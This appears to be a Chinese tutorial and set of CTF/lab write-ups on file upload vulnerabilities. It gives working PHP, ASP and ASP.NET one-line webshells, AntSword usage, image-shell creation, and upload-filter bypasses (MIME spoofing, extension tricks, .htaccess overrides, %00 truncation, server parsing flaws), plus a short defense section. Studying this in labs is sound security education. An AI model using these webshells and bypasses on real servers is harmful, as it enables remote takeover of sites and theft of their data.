十一、文件上传漏洞
参考内容来源于https://blog.csdn.net/weixin_44519789/article/details/116570426
1 WebShell与WebShell管理工具
(1)什么叫做WebShell?
WebShell简单介绍
- WebShell,简称网页后门。简单来说它是运行在Web应用之上的远程控制程序。
- WebShell其实就是一张网页,由PHP、JSP、ASP、ASP.NET等这类web应用程序语言开发,但WebShell并不具备常见的网页的功能,例如登录、注册、信息展示等功能,一般会具备文件管理、端口扫描、提权、获取系统信息等功能。
常见的WebShell有哪些?
- 大马、小马、各种马等;
- 拥有较完整功能的WebShell,我们一般称为大马;
- 功能简易的WebShell称为小马;
- 除此之外还存在一句话木马、菜刀马、脱库马等等的名词,是对于WebShell功能或者特性的简称。
(2)WebShell有什么作用?
举例模拟
txt
前期准备:
1.安装集成环境:推荐使用PHPstudy;
2.安装好环境之后编写一句话木马(后续会详细讲解一句话木马);
3.进行本地利用。演示
- 启动phpstudy集成环境;
- 在
www根目录下编写一句话木马<?php @eval($_POST[x]); ?>,文件名命名为shell.php;
- 浏览器访问
127.0.0.1/shell.php;
- 使用
HackBar利用POST请求上传参数x,此处为看到效果,将参数定义为phpinfo();
注:Post data区域的数据记得写完后加上分号,否则不会执行成功,此处需要写的完整语句为x=phpinfo();
实现了任意代码执行
x=system(ipconfig);
大马有什么作用?
- 当我们通过某些操作上传了大马之后,我们可以通过大马来获取目标主机的控制权限、对内网进行扫描、获取内部系统的信息、盗取数据库等等一系列操作;
- 我们可以通过在GitHub上来搜索一些
WebShell(网上的信息可能存在后门要注意分辨)。
(3)WebShell之PHP一句话木马解读
php
<?php @eval($_POST[x]); ?>$_POST[x]:获取POST请求参数中x的值。例如POST请求中传递x=phpinfo();,那么$_POST[X]就等同于phpinfo();;@:错误控制运算符,当将@放置在一个PHP表达式之前,该表达式可能产生的任何错误信息都会被忽略掉;eval():将字符串当作PHP代码去执行。例如eval('phpinfo();'),其中phpinfo();会被当做PHP代码去执行;
txt
实际传递及调用过程
|(语句)
|<?php @eval($_POST[x]); ?>
▼
|(传参)
|x = phpinfo();
▼
|(调用)
|<?php @eval('phpinfo();'); ?>
▼
传递及调用完毕- 可以通过该
WebShell,传递任意PHP代码,让其去执行,从而达到任意代码执行。
(4)WebShell之常用的一句话木马
ASP
asp
<%eval request("x")%>ASP.NET
asp.net
<%@ Page Language="Jscript"%><%eval (Request.Item["x"],"unsafe");%>这些一句话木马的本质是一样的,不同环境要用不同的一句话木马
(5)WebShell管理工具
常用的WebShell管理工具
- 中国菜刀
- 中国蚁剑
- 冰蝎
- 哥斯拉
- ...
中国蚁剑为例
使用
- 打开中国蚁剑,右键打开"添加数据"
- 把刚才木马的路径填入
- 各参数说明
URL地址:就是一句话木马的地址
链接密码:就是变量
x编码设置:UTF8
连接类型:PHP(取决于你用的木马类型)
- 点击"测试连接",若连接成功,点击"添加"即可
- 双击该区域即可进入后台,即可进行任意操作
使用注意事项
直接点击该文件运行若触发报错或运行不成功
解决方法:以管理员身份运行
使用虚拟终端
数据库连接
还可以连接数据库,前提是要知道数据库的账号和密码
插件市场
还有一个拓展功能 —— 插件市场,插件市场里面可以选择安装一些常见的插件,如存活扫描之类的等等。
(6)拓展思考
思考一
- 如果去掉一句话木马中的错误控制运算符
@会产生怎样的效果?
- 会出现以下报错语句
注:若未出现以上报错,则重启phpstudy中的apache服务器后再进行测试
思考二
- 小马和大马之间有什么区别?
- 小马的代码量小,但是运行的时候需要环境(功能单一且操作复杂);
- 大马的功能强大,但是限制多(比如说会有很多限制函数),且代码量大。
2.文件上传漏洞概述
(1)随处可见的文件上传功能
- 大部分站点都具有文件上传功能,例如头像更改,文章编辑,附件上传等等。
(2)文件上传功能背后的业务逻辑是什么?
逻辑
- 文件上传的这个功能是如何实现的?
- 文件上传功能的作用是将本地文件上传至服务器进行保存;
- 当我们找到上传的入口,上传文件之后,可能会回显文件上传的路径;
- 如果回显了文件上传路径,那么我们就可以根据回显的文件上传路径进行访问,那么我们就可以访问到服务器上的这个文件。
实战
- 此处及后续使用的一句话木马
php
<?php @eval($_POST[x]); ?>- 可以尝试
pikachu靶场进行复现
题目:client check
解题过程:
- 漏洞分析:先上传一个php一句话木马,上传时被截断了,说明进行了文件类型检测;
- 查看源码,白名单过滤
". jpg " 、" .png " 、" .gif "
js
<script>
// 定义一个检查文件扩展名的函数,接受文件名作为参数
function checkFileExt(filename) {
var flag = false; // 初始化状态,假设文件不符合要求
var arr = ["jpg", "png", "gif"]; // 定义允许上传的文件扩展名数组
// 获取文件名中最后一个点的位置,作为扩展名的起始位置
var index = filename.lastIndexOf(".");
// 提取文件的扩展名(点后的部分)
var ext = filename.substr(index + 1);
// 遍历允许的扩展名数组,检查文件扩展名是否符合要求
for (var i = 0; i < arr.length; i++) {
if (ext == arr[i]) {
flag = true; // 如果匹配到一个符合要求的扩展名,设置 flag 为 true
break; // 找到符合条件的扩展名后立即退出循环
}
}
// 如果 flag 为 false,说明文件扩展名不符合要求
if (!flag) {
alert("上传的文件不符合要求,请重新选择!"); // 弹出提示框提醒用户
location.reload(true); // 刷新页面,要求用户重新选择文件
}
}
</script>- 绕过姿势
- 第一种 禁用JavaScript 脚本
- 第二种 通过 BurpSuite 抓包来修改后缀
方法1 禁用JavaScript脚本
- 单击右键,选择"检查"
- 然后再点击弹出窗口的右上角"三点",选择"设置"
- 高级设置中开启"禁用JavaScript *"
- 上传一句话木马
shell.php
- 绕过成功
方法2 通过 Burp Suite来修改后缀
- 将木马后缀php改为允许的文件类型进行上传,然后进行抓包修改
- 设置代理
- 输入url
- 选择一句话木马"shell.png",并开启拦截器,然后点击"开始上传"
- 查看拦截的数据包,找到文件名属性
- 双击篡改为".php",点击"放行"
- 绕过成功
(3)任意文件上传的安全风险
疑问
假设文件上传功能没有对上传的文件进行限制,可能会引发哪些安全风险?
如果对方是LAMP架构,是否能上传PHP的WebShell到服务端上,然后通过访问上传后的文件地址,从而执行WebShell中的代码,达到控制对方服务器的目的?
txt
LAMP架构简介
LAMP是一个常用的Web服务器架构,包含四个开源软件:Linux、Apache、MySQL和PHP/Perl/Python。它通常用于开发和部署动态Web应用程序,提供了一个完整的Web开发环境。
组成部分
Linux:作为操作系统基础,提供稳定性和兼容性,支持Web站点的运行;
Apache:作为Web服务器,处理HTTP请求,发送网页和文件内容;
MySQL:作为关系型数据库管理系统,存储和管理数据;
PHP/Perl/Python:作为编程语言,负责解释动态网页文件,沟通Web服务器和数据库系统。
工作原理(在LAMP架构中,处理一次动态页面请求的流程)
Apache处理HTTP请求;
通过CGI接口访问PHP应用程序;
PHP解释器执行PHP代码;
PHP程序访问调用数据库;
最后将结果反馈给客户端。实验演示
- 上传一句话木马
- 上传成功之后,尝试访问木马,访问成功之后来验证一下,尝试返回
phpinfo的信息。
- 利用蚁剑连接
- 进入服务器后台,可进行任意操作!
(4)什么是文件上传漏洞
- 文件上传漏洞是指文件上传功能没有对上传的文件做合理严谨的过滤,导致用户可以利用此功能,上传能被服务端解析执行的文件,并通过此文件获得执行服务端命令的能力。
3.文件上传漏洞绕过
此处使用upload-labs靶场进行实验
(1)文件上传的验证机制有哪些
- 客户端JavaScript验证
- 服务端MIME类型验证
- 服务端文件内容验证(文件头——文件幻数、文件加载检测)
- 服务端文件扩展名验证(黑名单、白名单)
txt
文件幻数是特定文件格式的标识,如Java的.class文件中的CAFEBABE。通过工具WinHex和Linux命令file可以查看文件的幻数以确定其类型。尽管这些工具能提供参考,但结果可能不准确,因此建议结合多种方式验证。客户端JavaScript验证
简介
- **目的:**对上传文件的文件格式进行一个验证
- 客户端JavaScript验证验证的机制
js
<script type="text/javascript">
function checkUpload(fileobj){
var fileArr = fileobj.value.split("."); //对文件名进行处理
var ext = fileArr[fileArr.length-1]; //得到文件扩展名
if(ext!='gif') //验证扩展名
{
alert("Only upload GIF images.");
fileobj.value = ""; //清除数据
}
}
</script>实战
- 实战题:upload-labs 靶场第一题 —— JS检查
源码分析
js
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}两个关于禁用JS的浏览器插件
绕过姿势("同2.2.2 实战",不再赘述)
- 方法一:修改JavaScript中关键的检测函数,或者直接通过插件禁用JavaScript。
- 方法二:抓包篡改
服务端MIME类型验证
简介
- MIME类型是描述信息内容类型的英特网标准
- 绕过姿势:利用Burp抓包,将报文中的Content-Type改成允许的类型
- Content-Type: image/gif
- Content-Type: image/jpg
- Content-Type: image/png
......
实战
- 实战题:upload-labs 靶场第二题 —— JS检查
源码分析
js
$is_upload = false; // 默认上传状态设置为 false
$msg = null; // 初始化消息变量
// 检查是否提交了表单
if (isset($_POST['submit'])) {
// 检查上传文件夹是否存在
if (file_exists($UPLOAD_ADDR)) {
// 检查文件类型是否为图片文件 (JPEG, PNG, GIF)
if (($_FILES['upload_file']['type'] == 'image/jpeg') ||
($_FILES['upload_file']['type'] == 'image/png') ||
($_FILES['upload_file']['type'] == 'image/gif')) {
// 尝试将上传的文件移动到目标文件夹
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
// 如果上传成功,获取文件路径并设置上传成功标志
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
// 如果文件类型不是支持的图片格式,设置错误消息
$msg = '文件类型不正确,请重新上传!';
}
} else {
// 如果文件夹不存在,提示用户手动创建文件夹
$msg = $UPLOAD_ADDR . ' 文件夹不存在, 请手工创建!';
}
}绕过姿势
- 抓包修改MIME类型
- 选择shell.php进行上传抓包
- 抓到的包原MIME类型为
Content-Type: application/octet-strea
Content-Type: application/octet-stream(octet:八位字节流/字节流)是一种表示二进制流数据的 MIME 类型,用于描述文件或数据内容无法通过其他 MIME 类型进行归类的情况。它经常用于文件传输和下载的场景,确保接收方知道文件是以二进制流形式传输的。
- 对MIME类型进行篡改后放行
- 绕过上传成功
服务端文件内容验证-文件头
简介
- 图片格式往往不是根据文件后缀名去做判断的
- 文件头是文件开头的一段二进制,不同的图片类型,文件头是不同的。
- 文件头又称文件幻数(shù)。
常见的文件幻数
JPG: FF D8 FF EO 00 10 4A 46 49 46GIF:47 49 46 38 39 61PNG:89 50 4E 47
如何生成图片马
txt
1.在路径下准备好一句话木马.php和一张图片.png(或者.jpg)
2.输入系统指令:copy 一张图片.png/b+一句话木马.php/a 生成图片马名称.png
3.合成图片马完成
实战
- 实战题:upload-labs 靶场第十三题 —— 图片马绕过
源码
php
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
}
else{
$msg = "上传失败";
}
}
}注释:
php
// 定义函数 getReailFileType 用来获取文件的真实类型
function getReailFileType($filename){
// 打开文件,模式为“只读二进制”(rb)
$file = fopen($filename, "rb");
// 读取文件的前2个字节(通常用来判断文件类型)
$bin = fread($file, 2);
// 关闭文件
fclose($file);
// 使用 unpack 函数将读取的2个字节解包成数组,'C2chars' 表示解包为两个字符
$strInfo = @unpack("C2chars", $bin);
// 将两个字节转换成整数(16进制)
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
// 初始化变量,用来存储文件类型
$fileType = '';
// 判断文件类型的常见前两个字节值
switch($typeCode){
case 255216: // JPG 文件的前两个字节是 0xFFD8(十进制 255216)
$fileType = 'jpg';
break;
case 13780: // PNG 文件的前两个字节是 0x8950(十进制 13780)
$fileType = 'png';
break;
case 7173: // GIF 文件的前两个字节是 0x4749(十进制 7173)
$fileType = 'gif';
break;
default: // 如果无法识别,返回 unknown
$fileType = 'unknown';
}
// 返回文件类型
return $fileType;
}
// 初始化上传状态
$is_upload = false;
$msg = null;
// 判断是否是表单提交
if(isset($_POST['submit'])){
// 获取上传的临时文件路径
$temp_file = $_FILES['upload_file']['tmp_name'];
// 调用 getReailFileType 函数获取文件类型
$file_type = getReailFileType($temp_file);
// 如果文件类型未知,则提示错误信息
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
// 生成上传文件的目标路径,使用随机数和时间戳避免文件名重复
$img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
// 尝试将文件移动到目标路径
if(move_uploaded_file($temp_file, $img_path)){
// 如果文件上传成功,设置上传状态为 true
$is_upload = true;
} else {
// 如果文件上传失败,设置错误消息
$msg = "上传失败";
}
}
}绕过姿势
- 1.伪造文件头绕过
- 2.利用服务器将木马文件解析成图片文件,因此向其发送执行该文件的请求时,服务器只会返回这个"图片"文件,并不会执行相应命令;利用文件包含漏洞可以将图片格式的文件当作php文件解析执行:
txt
http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/上传文件的回显路径&submit=提交查询wp
- 上传图片马
- 打开图片马,查看其存储路径
- 上传成功
使用图片马需要含有文件包含漏洞,手动创建一个文件包含漏洞
include.php源码
php
<?php
$file = $_GET['file'];
include $file;
?>上边的实战中断(服务端文件内容验证-文件头 未完结)
服务器文件扩展名验证-黑名单
- 服务器文件扩展名验证-黑名单原理
后缀名大小写绕过
- 后缀名大小写绕过原理:服务端没有将后缀名转换为统一格式进行比对,导致可以上传后缀为php的文件,又因windows操作系统大小写不敏感,所以.php仍会被当成php文件解析
php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}- 通过源代码我们可以发现,黑名单里虽然过滤的很全面,但是在下面的后缀名处理之中却出现了纰漏,没有将后缀名转换为小写
php
$file_ext = strtolower($file_ext); //转换为小写- 这样的话,我们就可以进行大小写绕过了,如直接上传后缀名为
.pHP的文件
修改后缀名绕过
- 源码分析
php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}- 用黑名单不允许上传
.asp,.aspx,.php,.jsp后缀的文件,但可以上传.phtml .phps .php5 .pht - 前提是apache的httpd.conf中有如下配置代码
txt
AddType application/x-httpd-php .php .phtml .phps .php5 .pht- 当我们修改文件后缀名之后,可以发现到文件正常上传成功
- 我们从
RAW包中可以查找到文件上传的位置
- 我们可以在浏览器中进行构建URL(就是构建一下访问地址)进行访问
- 构建的URL:
http://127.0.0.1/upload/upload/202105181219104196.php5 - URL模板:
http://127.0.0.1/upload/文件上传路径(该URL模板只适用该案例)
重写绕过
- 服务端将黑名单的后缀名替换为空,但仅进行一次。上传.phphpp后缀,替换php一次为空,则后缀为.php
php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}特殊可解析后缀绕过
- 黑名单规则不严谨,在某些特定环境中某些特殊后缀名仍会被当做PHP文件解析。php/php2/php3/php4/php5/php6/php7/pht/phtm/phtml
- 基于debian和ubuntu的apt-get安装apache,默认对于文件的解析规则如下
.htaccess绕过
- 在apache里,这个文件作为一个配置文件,可以用来控制所在目录的访问权限以及解析设置。即是,可以通过设置可以将该目录下的所有文件作为php文件来解析
.htaccess可以写入apache配置信息,改变当前目录以及子目录的Apache配置信息- 前提条件: 配置上允许.htaccess生效 Apache开启rewrite模块 .apache配置文件为AllowOverride All(默认为None)
- 方法一: 所有jpg后缀都会被当做PHP解析
txt
- AddType application/x-httpd-php.jpg
- 方法二: 带有jpg关键字会被当PHP解析
txt
<FilesMatch "sec.jpg">
SetHandler application/x-httpd-php
</FilesMatch>利用操作系统特性-windos
- 利用window对于文件和文件名的限制,以下字符放在结尾时,不符合操作系统的命名规范,在最后生成文件时,字符会被自动去除
源码分析:
- 第一种: 对应upload第6题
php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}这题没有对后缀名进行去空,因此可以在后缀名加空格绕过
%00截断
- %00是chr(O),它不是空格,是NULL,空字符。
- 当程序在输出含有chr(O)变量时,chr(O)后面的数据会被停止,换句话说,就是误把它当做结束符,后面的数据直接忽略,这就导致漏洞产生的原因。
- 在文件上传中,利用%00截断,在文件扩展名验证时,是取文件的扩展名来做验证,但是最后文件保存在本地时,%00会截断文件名,只保存%00之前的内容。
- 前提条件: PHP版本 < 5.34 、php的magic_quotes_gpc为OFF状态
源码分析:
- 第一种: 对应upload第11题
php
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}白名单判断,但$img_path是直接拼接,因此可以利用%00截断绕过。
php
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;- 第二种: 对应upland第19题
前提条件: PHP版本 < 5.34 、php的magic_quotes_gpc为OFF状态
源码分析:
php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在`save_name利用00截断绕过,方法同上
(2)服务器解析漏洞
- 解析漏洞,是指中间件(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。
Apache 解析漏洞
- Apache解析文件规则是从右到左。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。
- Apache 解析漏洞
IIS6.0 漏洞
- 目录解析 :
目录名为.asp、.asa、.cer,则目录下的所有文件都会被作为ASP;
url/test.asp/shell.jpg会被当作asp脚本运行。
- 文件解析 :
文件名中分号后不被解析,例如.asp、.asa、.cer;
url/test.asp;shell.jpg会被当作asp脚本运行。
- 文件类型解析 :
.asa,.cer,.cdx都会被作为asp文件执行。
url/shell.asa会被作为asp文件执行。
Nginx 漏洞
- PHP+nginx默认是以cgi的方式去运行,当用户配置不当,会导致任意文件被当作php去解析。
利用条件:
以FastCGl运行 cgi.fix_pathinfo=1(全版本PHP默认为开启)
例如如果满足上述条件,当你访问
url/shell.jpg/shell.php时,shell.jpg会被当作php去执行。
Nginx 文件名逻辑漏洞(CVE-2013-4547)
影响版本:Nginx 0.8.41 ~ 1.4.3/1.5.0 ~ 1.5.7
利用过程:上传一个shell.jpg文件,注意最后为空格,访问url/shell.jpg[Ox20][Ox00].php(两个中括号中的数字是用Burp在Hex界面中更改)
4.文件上传漏洞防御
- 服务端文件扩展名使用白名单检测+文件名重命名
- 对文件内容进行检测
- 对中间件做安全的配置
5.题目复现
题目:[ezupload]
- 题目来源:polarctf-web-[ezupload]
- 解题:
点击上传按钮,提示只能上传GIF文件
上传木马文件shell.php并抓包
木马内容为:
php
<?php
@eval($_POST['admin']);
?>
将mime类型改为:image/gif
放包得到木马位置
使用蚁剑连接
在www目录下找到flag.php文件
查看得到flag
题目:[upload]
- 题目来源:polarctf-web-[upload]
- 解题:
查看网页源代码,看到注释?action=show_code
访问该url,看到源码
代码审计
php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']); # 将文件名取出并去除前后空格
$file_name = str_ireplace($deny_ext,"", $file_name); # 如果文件名中存在黑名单中的扩展名则去除
$temp_file = $_FILES['upload_file']['tmp_name']; # 获取文件上传的临时路径
$img_path = UPLOAD_PATH.'/'.rand(10000,99999).$file_name; # 构造新的文件路径(此处目的是构造新的文件名)
if (move_uploaded_file($temp_file, $img_path)) { # 将文件名改为 随机数.文件名
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}将木马名从shell.php改为shell.pphphp,进行扩展名双写绕过
上传成功,不知道木马的url,利用御剑进行目录扫描,扫到了/upload,进行访问
用蚁剑进行连接,在根目录下拿到flag
注:上传的木马url也可以直接查看源码
题目:[uploader]
- 题目来源:polarctf-web-[uploader]
- 解题:
审计代码
php
<?php
$sandBox = md5($_SERVER['REMOTE_ADDR']); # 将用户本地地址进行md5加密
if(!is_dir($sandBox)){ # 如果该目录不存在则
mkdir($sandBox,0755,true); # 创建该目录;权限0755(设置权限为所有者可读写执行,组和其他可读执行);目录遍历创建开启
}
if($_FILES){ # 如果上传成功
move_uploaded_file($_FILES['file']['tmp_name'],$sandBox."/".$_FILES["file"]["name"]); # 将上传文件转存到服务器上的临时存储路径
echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo $sandBox;
}
highlight_file(__FILE__);本题没有上传表单,自己写一个表单,上传到该题目地址(使用小皮等测试环境进行建站访问)
php+HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>文件上传表单</title>
</head>
<body>
<h2>上传文件</h2>
<form action="http://9881c8fd-afce-472b-9324-3f0baf474691.www.polarctf.com:8090/" method="post" enctype="multipart/form-data">
<label for="file">选择文件:</label>
<input type="file" name="file" id="file"><br><br>
<input type="submit" name="submit" value="上传">
</form>
</body>
</html>
进行一句话木马上传,回显了md5后的目录上传地址
木马内容:
php
<?php
@eval($_POST['admin']); # 一句话木马
?>
访问该目录
木马成功上传,蚁剑连接,在左侧目录列表找文件不方便,建议在右侧文件列表找
得到flag
注:制作表单那步可以改为用脚本上传
python
#python
import requests
url = "http://9881c8fd-afce-472b-9324-3f0baf474691.www.polarctf.com:8090/"
files = {'file': open('shell.php', 'rb')}
response = requests.post(url, files=files)
#如果状态码是200
if response.status_code == 200:
print("Sucessfully")
print(f"服务器返回信息: {response.text}")
else:
print(f"状态码为: {response.status_code}")
后续操作一样
题目:[upload1]
- 题目来源:polarctf-web-[upload1]
- 解题:
题目要求上传shell,但又只能上传图片格式文件
查看源码是使用js进行校验文件类型的
使用插件Javascript Switcher禁用js代码
调成灰色即代表禁用js,shell内容
php
<?php
@eval($_POST['admin']);
?>
点击上传,上传成功
使用蚁剑连接,得到flag
